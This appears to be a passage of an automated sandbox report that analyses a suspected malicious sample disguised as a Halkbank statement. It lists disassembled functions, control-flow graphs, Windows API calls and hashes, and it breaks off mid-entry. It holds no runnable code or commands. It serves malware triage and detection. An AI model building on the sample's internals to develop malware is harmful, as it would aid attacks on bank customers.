                                                              • Instruction ID: 634db5a04913cdf9d92cb09bca2f16d50284c6f639c8914422184e3b4b99fde1
                                                              • Opcode Fuzzy Hash: f1e8dca7c171860fc8d19cc92744c73346687d785f538e86b6c7b25a396d336c
                                                              • Instruction Fuzzy Hash: 2F416BB1D016188FEB58CF6BC945799FAF3AFC9304F14C1AAD50CA6264DB740A86CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01006EB8 Relevance: 10.5, Strings: 8, Instructions: 473COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 526 1006eb8-1006eed 527 1006ef3-1006f16 526->527 528 100731c-1007320 526->528 537 1006fc4-1006fc8 527->537 538 1006f1c-1006f29 527->538 529 1007322-1007336 528->529 530 1007339-1007347 528->530 535 10073b8-10073cd 530->535 536 1007349-100735e 530->536 544 10073d4-10073e1 535->544 545 10073cf-10073d2 535->545 546 1007360-1007363 536->546 547 1007365-1007372 536->547 539 1007010-1007019 537->539 540 1006fca-1006fd8 537->540 552 1006f38 538->552 553 1006f2b-1006f36 538->553 548 100742f 539->548 549 100701f-1007029 539->549 540->539 558 1006fda-1006ff5 540->558 554 10073e3-100741e 544->554 545->554 555 1007374-10073b5 546->555 547->555 559 1007434-1007464 548->559 549->528 550 100702f-1007038 549->550 556 1007047-1007053 550->556 557 100703a-100703f 550->557 560 1006f3a-1006f3c 552->560 553->560 602 1007425-100742c 554->602 556->559 565 1007059-100705f 556->565 557->556 585 1007003 558->585 586 1006ff7-1007001 558->586 587 1007466-100747c 559->587 588 100747d-1007484 559->588 560->537 567 1006f42-1006fa4 560->567 568 1007065-1007075 565->568 569 1007306-100730a 565->569 615 1006fa6 567->615 616 1006faa-1006fc1 567->616 583 1007077-1007087 568->583 584 1007089-100708b 568->584 569->548 572 1007310-1007316 569->572 572->528 572->550 589 100708e-1007094 583->589 584->589 590 1007005-1007007 585->590 586->590 589->569 596 100709a-10070a9 589->596 590->539 597 1007009 590->597 599 1007157-1007182 call 1006d00 * 2 596->599 600 10070af 596->600 597->539 617 1007188-100718c 599->617 618 100726c-1007286 599->618 604 10070b2-10070c3 600->604 604->559 605 10070c9-10070db 604->605 605->559 607 10070e1-10070f9 605->607 671 10070fb call 1007488 607->671 672 10070fb call 1007498 607->672 611 1007101-1007111 611->569 614 1007117-100711a 611->614 619 1007124-1007127 614->619 620 100711c-1007122 614->620 615->616 616->537 617->569 621 1007192-1007196 617->621 618->528 640 100728c-1007290 618->640 619->548 622 100712d-1007130 619->622 620->619 620->622 625 1007198-10071a5 621->625 626 10071be-10071c4 621->626 627 1007132-1007136 622->627 628 1007138-100713b 622->628 643 10071b4 625->643 644 10071a7-10071b2 625->644 630 10071c6-10071ca 626->630 631 10071ff-1007205 626->631 627->628 629 1007141-1007145 627->629 628->548 628->629 629->548 636 100714b-1007151 629->636 630->631 637 10071cc-10071d5 630->637 633 1007211-1007217 631->633 634 1007207-100720b 631->634 641 1007223-1007225 633->641 642 1007219-100721d 633->642 634->602 634->633 636->599 636->604 638 10071e4-10071fa 637->638 639 10071d7-10071dc 637->639 638->569 639->638 645 1007292-100729c call 1005ba8 640->645 646 10072cc-10072d0 640->646 647 1007227-1007230 641->647 648 100725a-100725c 641->648 642->569 642->641 649 10071b6-10071b8 643->649 644->649 645->646 659 100729e-10072b3 645->659 646->602 652 10072d6-10072da 646->652 655 1007232-1007237 647->655 656 100723f-1007255 647->656 648->569 650 1007262-1007269 648->650 649->569 649->626 652->602 657 10072e0-10072ed 652->657 655->656 656->569 662 10072fc 657->662 663 10072ef-10072fa 657->663 659->646 668 10072b5-10072ca 659->668 665 10072fe-1007300 662->665 663->665 665->569 665->602 668->528 668->646 671->611 672->611
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                              • API String ID: 0-1435242062
                                                              • Opcode ID: adfd9f23d88de79a66017bf999e5749e17557d3850998f8b1e40581b8ef0b2d6
                                                              • Instruction ID: 0cce7e0ea36da1dd7619956acf95a41180925a963d6c3940f63356046075c09b
                                                              • Opcode Fuzzy Hash: adfd9f23d88de79a66017bf999e5749e17557d3850998f8b1e40581b8ef0b2d6
                                                              • Instruction Fuzzy Hash: F5125C30A00209DFEB66CF68D884A9DBBF2BF48314F158599F9859B2A1DB35FD41CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 010021B4 Relevance: 6.8, Strings: 5, Instructions: 504COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 673 10021b4-10021be 675 10021c0-10021c9 673->675 676 1002149-1002152 673->676 677 1002158-1002161 675->677 678 10021cb-1002203 675->678 676->677 683 1002168-1002190 677->683 681 1002225-1002274 678->681 682 1002205-1002224 678->682 688 1002276-100227d 681->688 689 100228f-1002297 681->689 690 1002286-100228d 688->690 691 100227f-1002284 688->691 693 100229a-10022ae 689->693 690->693 691->693 695 10022b0-10022b7 693->695 696 10022c4-10022cc 693->696 697 10022b9-10022bb 695->697 698 10022bd-10022c2 695->698 699 10022ce-10022d2 696->699 697->699 698->699 701 1002332-1002335 699->701 702 10022d4-10022e9 699->702 703 1002337-100234c 701->703 704 100237d-1002383 701->704 702->701 710 10022eb-10022ee 702->710 703->704 714 100234e-1002352 703->714 705 1002389-100238b 704->705 706 1002e7e 704->706 705->706 708 1002391-1002396 705->708 711 1002e83-100307c 706->711 712 1002e2c-1002e30 708->712 713 100239c 708->713 715 10022f0-10022f2 710->715 716 100230d-100232b call 10002b8 710->716 738 10030a7-10030c8 711->738 739 100307e-1003096 711->739 719 1002e32-1002e35 712->719 720 1002e37-1002e7d 712->720 713->712 721 1002354-1002358 714->721 722 100235a-1002378 call 10002b8 714->722 715->716 717 10022f4-10022f7 715->717 716->701 717->701 724 10022f9-100230b 717->724 719->711 719->720 721->704 721->722 722->704 724->701 724->716 740 10030f3-10031b6 738->740 741 10030ca-10030f1 738->741 739->738 741->740
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$Xaq$Xaq$Xaq$Xaq
                                                              • API String ID: 0-3187220489
                                                              • Opcode ID: 4c7d3e66094859acd81f72234c866f52df0ac3a3a3b3f661a65190483468cf72
                                                              • Instruction ID: d6b6ca51fe7de3cb5826d7820fdcf97ae2b603cabbe5486d99b94f581d89b8b4
                                                              • Opcode Fuzzy Hash: 4c7d3e66094859acd81f72234c866f52df0ac3a3a3b3f661a65190483468cf72
                                                              • Instruction Fuzzy Hash: 7A1248B680F3C45FDB534B7488682957F70EF67208F2848EFD0C5DA1A3E6661A4AD742
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 007AF6B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 221COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1322 7af6b0-7af6b1 1323 7af689-7af691 1322->1323 1324 7af6b3-7af6f0 1322->1324 1325 7af669-7af66f 1323->1325 1326 7af693-7af699 1323->1326 1328 7af76e-7af7b6 1324->1328 1329 7af6f2-7af730 call 7ad84c 1324->1329 1330 7af671 1325->1330 1326->1330 1331 7af69b-7af6af 1326->1331 1333 7af7b8-7af7be 1328->1333 1334 7af7c1-7af7c8 1328->1334 1337 7af735-7af736 1329->1337 1335 7af649-7af651 1330->1335 1336 7af672-7af683 1330->1336 1331->1322 1333->1334 1340 7af7ca-7af7d0 1334->1340 1341 7af7d3-7af80b 1334->1341 1338 7af629-7af62f 1335->1338 1339 7af653-7af659 1335->1339 1342 7af631-7af639 1338->1342 1339->1342 1343 7af65b-7af663 1339->1343 1340->1341 1345 7af813-7af872 CreateWindowExW 1341->1345 1346 7af63b-7af643 1342->1346 1347 7af611 1342->1347 1348 7af87b-7af8b3 1345->1348 1349 7af874-7af87a 1345->1349 1350 7af5e9-7af5ef 1347->1350 1351 7af613-7af619 1347->1351 1361 7af8c0 1348->1361 1362 7af8b5-7af8b8 1348->1362 1349->1348 1353 7af5f1 1350->1353 1352 7af61b-7af61d 1351->1352 1351->1353 1357 7af61f-7af62f 1352->1357 1358 7af5f4-7af5f9 1352->1358 1359 7af5c9-7af5cc 1353->1359 1360 7af5f3 1353->1360 1357->1342 1365 7af5fb-7af60f 1358->1365 1366 7af5d1 1358->1366 1364 7af5da-7af5e0 1359->1364 1360->1358 1367 7af8c1 1361->1367 1362->1361 1365->1347 1366->1364 1367->1367
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: uz$uz
                                                              • API String ID: 0-1270533253
                                                              • Opcode ID: 8ba4349d238668f76b46d29b624453a3479530f7d6fa9da9d800ff3c8436aeb0
                                                              • Instruction ID: f15a1ee1f561428f030651ebdd58e663a83309d45ed8341b2d6e3188fbc7b353
                                                              • Opcode Fuzzy Hash: 8ba4349d238668f76b46d29b624453a3479530f7d6fa9da9d800ff3c8436aeb0
                                                              • Instruction Fuzzy Hash: 30812E71D0A3899FDF12DFA4C85458DBFB1AF4A300F1982EBE444DB2A2D3799845CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 007AF750 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 007AF862
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID: uz$uz
                                                              • API String ID: 716092398-1270533253
                                                              • Opcode ID: 5bace7b9f94ae0a8f800eb4b75195c24e912bee80de21d7b5ee8e74cb53573f0
                                                              • Instruction ID: 27321be764ebaf866786605296b8e3c109a2398950d4e13ddb28ce906a1f060f
                                                              • Opcode Fuzzy Hash: 5bace7b9f94ae0a8f800eb4b75195c24e912bee80de21d7b5ee8e74cb53573f0
                                                              • Instruction Fuzzy Hash: 5941B2B1D10309DFDB14CF9AC884ADEBBB5FF89310F24822AE419AB250D7759945CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 007AF74B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1368 7af74b-7af7b6 1369 7af7b8-7af7be 1368->1369 1370 7af7c1-7af7c8 1368->1370 1369->1370 1371 7af7ca-7af7d0 1370->1371 1372 7af7d3-7af80b 1370->1372 1371->1372 1373 7af813-7af872 CreateWindowExW 1372->1373 1374 7af87b-7af8b3 1373->1374 1375 7af874-7af87a 1373->1375 1379 7af8c0 1374->1379 1380 7af8b5-7af8b8 1374->1380 1375->1374 1381 7af8c1 1379->1381 1380->1379 1381->1381
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 007AF862
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID: uz$uz
                                                              • API String ID: 716092398-1270533253
                                                              • Opcode ID: da6f9f9f57c15c1530443e66eac0e48d737859fa1e485af1c1f22336edc4631a
                                                              • Instruction ID: 1b93e2aab1bdcafb4a150c11e7fb5ca421e7d95e463766dfb4e97d26aabde257
                                                              • Opcode Fuzzy Hash: da6f9f9f57c15c1530443e66eac0e48d737859fa1e485af1c1f22336edc4631a
                                                              • Instruction Fuzzy Hash: 1B41C1B1D003499FDB14CF99C884ADEBFB5FF89310F24822AE419AB250D7759845CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00E13328 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 231comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 00E1418D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220783498.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_e10000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID: uz
                                                              • API String ID: 2538663250-117461317
                                                              • Opcode ID: c1c68c83e9c670ec2b10928412741838f5c767f8a0a1e873d73350f77c0c14b7
                                                              • Instruction ID: 92b2eb91cdb8d5402c7c7dffe9d4ae46bfba36f162a8b743ca82769932478834
                                                              • Opcode Fuzzy Hash: c1c68c83e9c670ec2b10928412741838f5c767f8a0a1e873d73350f77c0c14b7
                                                              • Instruction Fuzzy Hash: A2913971A003498FCB01DFA4C845ADEBBF6BF89314F25516AE409BB261DB31AE85CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 007AD158 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 007AD3BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID: uz
                                                              • API String ID: 4139908857-117461317
                                                              • Opcode ID: 7b5340925ae316cddb04f877b7ca12c280cf207caa31e3a18c0bc1922a5e9446
                                                              • Instruction ID: 4b3200bc38732ed5b25fa7afdd3133cc1b498c6dca9c9c712b44e9bad2d4c989
                                                              • Opcode Fuzzy Hash: 7b5340925ae316cddb04f877b7ca12c280cf207caa31e3a18c0bc1922a5e9446
                                                              • Instruction Fuzzy Hash: 74816870A00B058FD724DF69D45579ABBF1FF89300F108A2EE48AD7A90D779E849CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00E11BF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00E11CB1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220783498.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_e10000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID: uz
                                                              • API String ID: 2714655100-117461317
                                                              • Opcode ID: 7a76c567daf0496c9a43d0b72583cb2dedd6fc4a85782ab344dc60e4c5957d7f
                                                              • Instruction ID: b90d6998f3adb7c7774964d5728e9eddd3bc0f6031dc3bcce1a12a9d0e7e862f
                                                              • Opcode Fuzzy Hash: 7a76c567daf0496c9a43d0b72583cb2dedd6fc4a85782ab344dc60e4c5957d7f
                                                              • Instruction Fuzzy Hash: 644129B5900305CFDB54CF99C448A9AFBF5FB88314F25C499D519A7321D374A981CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 007A4DA9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007A4E37
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID: uz
                                                              • API String ID: 3793708945-117461317
                                                              • Opcode ID: ac9d8987e6b55692e4537777a282e04a23d475e3737b7d21669f42b06a34993e
                                                              • Instruction ID: ac6cbab42be3d59bb04511bdb3baef4da493da81873d0bdd34926a1405db75d7
                                                              • Opcode Fuzzy Hash: ac9d8987e6b55692e4537777a282e04a23d475e3737b7d21669f42b06a34993e
                                                              • Instruction Fuzzy Hash: 3021E5B5D00249DFDB10CFA9D484ADEBFF4FB48310F14851AE918A3250C379A954CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 007A4DB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007A4E37
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID: uz
                                                              • API String ID: 3793708945-117461317
                                                              • Opcode ID: 4871d6020fa435219458590675f6c2a6a0a8ee88ddfdb0b0bf7ebb50432c7fba
                                                              • Instruction ID: e49bb0cf290471ca25d94f1cbbc4b8b5300238aa52f7a8d35d33b35fe9ab8c7b
                                                              • Opcode Fuzzy Hash: 4871d6020fa435219458590675f6c2a6a0a8ee88ddfdb0b0bf7ebb50432c7fba
                                                              • Instruction Fuzzy Hash: FB21C4B5D002499FDB10CFAAD984ADEBBF8FB48310F14841AE918A3350D379A954CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 007AD5B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007AD439,00000800,00000000,00000000), ref: 007AD62A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: uz
                                                              • API String ID: 1029625771-117461317
                                                              • Opcode ID: 5610d4a85ac8de6b18a098b45efcd8b9685501c6db7acfe2b7ee068c16d3e4c2
                                                              • Instruction ID: 28b9b95d92a2cbed871557bf0e4de1ab2c75c2f471a059ac92f43449ba542c75
                                                              • Opcode Fuzzy Hash: 5610d4a85ac8de6b18a098b45efcd8b9685501c6db7acfe2b7ee068c16d3e4c2
                                                              • Instruction Fuzzy Hash: B51156B6C002098FDB20CFAAD444ADEFBF4EB89310F15852ED419A7600C379A945CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 007AC148 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007AD439,00000800,00000000,00000000), ref: 007AD62A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: uz
                                                              • API String ID: 1029625771-117461317
                                                              • Opcode ID: 0f1c9a3fc7017bb13bb981d0af50b0cf858cb234565dd4acaf7b772ae6ea6c77
                                                              • Instruction ID: 570a1fb1f88f5833220413eaadbfa72e2873477d7cea22dbae6cc2f781e76af6
                                                              • Opcode Fuzzy Hash: 0f1c9a3fc7017bb13bb981d0af50b0cf858cb234565dd4acaf7b772ae6ea6c77
                                                              • Instruction Fuzzy Hash: 8D1129B5D003099FDB20DF9AD448ADEFBF4EB89310F10856ED419A7600C379A945CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 007AD358 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 007AD3BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID: uz
                                                              • API String ID: 4139908857-117461317
                                                              • Opcode ID: bd09e29fd5ecb526e1a35b8e830c274a0e1bb18c0bca03cadf38d86fb33f33e5
                                                              • Instruction ID: 9f919be338cd990cb4b762426ddf7b124068e7ce2c8629a24d3bb24852265944
                                                              • Opcode Fuzzy Hash: bd09e29fd5ecb526e1a35b8e830c274a0e1bb18c0bca03cadf38d86fb33f33e5
                                                              • Instruction Fuzzy Hash: 3A1110B5C00249CFCB20DF9AD444ADEFBF4EB88310F11852AD41AA7610C379A945CFA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00E14130 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 00E1418D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220783498.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_e10000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID: uz
                                                              • API String ID: 2538663250-117461317
                                                              • Opcode ID: 41880ea39d00dfe91f073f831238adb0cce2fd93ea26983b9d30e8e4b41f9da5
                                                              • Instruction ID: 94988bdad98b3cc35cf1025d5a0d2ebdc37025cb1a88a2f02bf092ebc260f611
                                                              • Opcode Fuzzy Hash: 41880ea39d00dfe91f073f831238adb0cce2fd93ea26983b9d30e8e4b41f9da5
                                                              • Instruction Fuzzy Hash: 5C1133B4D043898FCB10DFAAD449BDEBFF4EB48310F20845AD419A3250D379A585CFA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00E13318 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 00E1418D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220783498.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_e10000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID: uz
                                                              • API String ID: 2538663250-117461317
                                                              • Opcode ID: 42c90fe522df73c56368ddcdacb10925fb11d59b274cc699b012b1932d1a3a3e
                                                              • Instruction ID: b56fdf819539d3de01e72b12c51bad62286bca36d825ad1844bf2e27a49fa68c
                                                              • Opcode Fuzzy Hash: 42c90fe522df73c56368ddcdacb10925fb11d59b274cc699b012b1932d1a3a3e
                                                              • Instruction Fuzzy Hash: 521100B5D003499FDB20DF9AD449BDEBBF8EB48320F208459D519A7340D379A984CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01007850 Relevance: 3.2, Strings: 2, Instructions: 688COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $]q$$]q
                                                              • API String ID: 0-127220927
                                                              • Opcode ID: 1367479b95d209afcf476167b42951b867bade928bb3887ad2eb8c57435b6eee
                                                              • Instruction ID: 31a5667f018079100b56d07ce1a468502e771536347fd34c48ea025243749136
                                                              • Opcode Fuzzy Hash: 1367479b95d209afcf476167b42951b867bade928bb3887ad2eb8c57435b6eee
                                                              • Instruction Fuzzy Hash: E8524074E00218CFEB559BA4C864BAEBBB6FF88300F1081A9D14A6B395DF345E85DF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01008849 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q
                                                              • API String ID: 0-3120983240
                                                              • Opcode ID: af66fbcc9d5cbb1e1ae55a8b8b1457ef545593bf2446b02aeb6fcf52ce16fe77
                                                              • Instruction ID: 28da115774c10786aecf5ffe055e98b85023b82b81e4eccd83e0ff5533b1e0d1
                                                              • Opcode Fuzzy Hash: af66fbcc9d5cbb1e1ae55a8b8b1457ef545593bf2446b02aeb6fcf52ce16fe77
                                                              • Instruction Fuzzy Hash: E6B15370B00615CFF7669F2DC558B3D36E5BF95644F1880A7E686CB3E1EA29CC418B42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01005700 Relevance: 2.8, Strings: 2, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq$Haq
                                                              • API String ID: 0-4016896955
                                                              • Opcode ID: 2d6a9c16303cdb8e26154c85360ec21660337e162b02a48590922916384e9b39
                                                              • Instruction ID: a6bea85dade8099d632d5822db850baf5da0a3b669b6a2368f81fdfe1f8d7208
                                                              • Opcode Fuzzy Hash: 2d6a9c16303cdb8e26154c85360ec21660337e162b02a48590922916384e9b39
                                                              • Instruction Fuzzy Hash: EA91BF30704255CFEB269F68D854B2E7BE6FB89304F1484A8E8868B3C5DF399C41DB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06632830 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q$LR]q
                                                              • API String ID: 0-3917262905
                                                              • Opcode ID: d9eae06d55d47a846f8aaa3da652bd65bef3d88805c938fa907f9ba6a13de4c0
                                                              • Instruction ID: 5155a51aa1b2e072a63e07cac27b2f66f53fd8bdc1250fd7d11822607382e5b5
                                                              • Opcode Fuzzy Hash: d9eae06d55d47a846f8aaa3da652bd65bef3d88805c938fa907f9ba6a13de4c0
                                                              • Instruction Fuzzy Hash: EA81B131B101159FDB58EF39C8A496E77FAEF88714B118569E406DB3A1DB30ED02CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01005C60 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
